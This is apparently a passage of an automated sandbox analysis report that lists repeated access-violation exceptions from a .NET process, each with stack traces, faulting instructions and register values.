_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549824 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549832 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 43599832	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x55410a2 0x5540a49 0xb1ad05 0xb1a4e1 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549824 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549832 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 44993480	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x55417b4 0x5541211 0xb1aced 0xb1a5e7 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549856 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549864 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 42193448	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x55417b4 0x5541211 0xb1ad05 0xb1a5e7 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549856 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549864 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 43602544	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x55417b4 0x5541211 0xb1ad05 0xb1a5e7 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549856 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549864 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 44998816	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x5542b3b 0x55420e6 0xb19308 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2550676 registers.edi: 2550940 registers.eax: 0 registers.ebp: 2550684 registers.edx: 0 registers.ebx: 2552772 registers.esi: 45567724 registers.ecx: 45574700	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0x229d329 0x229d12b 0x2297710 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x229d460 registers.esp: 34992036 registers.edi: 34992088 registers.eax: 0 registers.ebp: 34992100 registers.edx: 5461040 registers.ebx: 34993540 registers.esi: 39920392 registers.ecx: 0	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d46cc 0xa6d3f62 0xa6d3e35 0xa6d26eb 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990564 registers.edi: 34990908 registers.eax: 0 registers.ebp: 34990572 registers.edx: 0 registers.ebx: 34993540 registers.esi: 40548376 registers.ecx: 41674660	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d46cc 0xa6d3f62 0xa6d3e4d 0xa6d26eb 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990564 registers.edi: 34990908 registers.eax: 0 registers.ebp: 34990572 registers.edx: 0 registers.ebx: 34993540 registers.esi: 40548376 registers.ecx: 42979368	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d46cc 0xa6d3f62 0xa6d3e4d 0xa6d26eb 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990564 registers.edi: 34990908 registers.eax: 0 registers.ebp: 34990572 registers.edx: 0 registers.ebx: 34993540 registers.esi: 40548376 registers.ecx: 40441192	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d9276 0xa6d8b31 0xa6d3e35 0xa6d29d4 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990540 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990548 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39523132 registers.ecx: 41750032	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d9276 0xa6d8b31 0xa6d3e4d 0xa6d29d4 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990540 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990548 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39523132 registers.ecx: 43096784	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d9276 0xa6d8b31 0xa6d3e4d 0xa6d29d4 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990540 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990548 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39523132 registers.ecx: 44651280	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d9ba2 0xa6d9549 0xa6d3e35 0xa6d2aec 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990592 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990600 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39523132 registers.ecx: 39533836	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6d8768 0xa6d9ba2 0xa6d9549 0xa6d3e4d 0xa6d2aec 0xa6d1881 0x229d9ff 0x2297855 0x2296f0b 0x2293c6b 0x22935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71c42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71c5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71c52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71d074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71d07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71d91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71d91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71d91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71d9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6d87ab registers.esp: 34990592 registers.edi: 34990932 registers.eax: 0 registers.ebp: 34990600 registers.edx: 0 registers.ebx: 34993540 registers.esi: 39518432 registers.ecx: 40900360	1
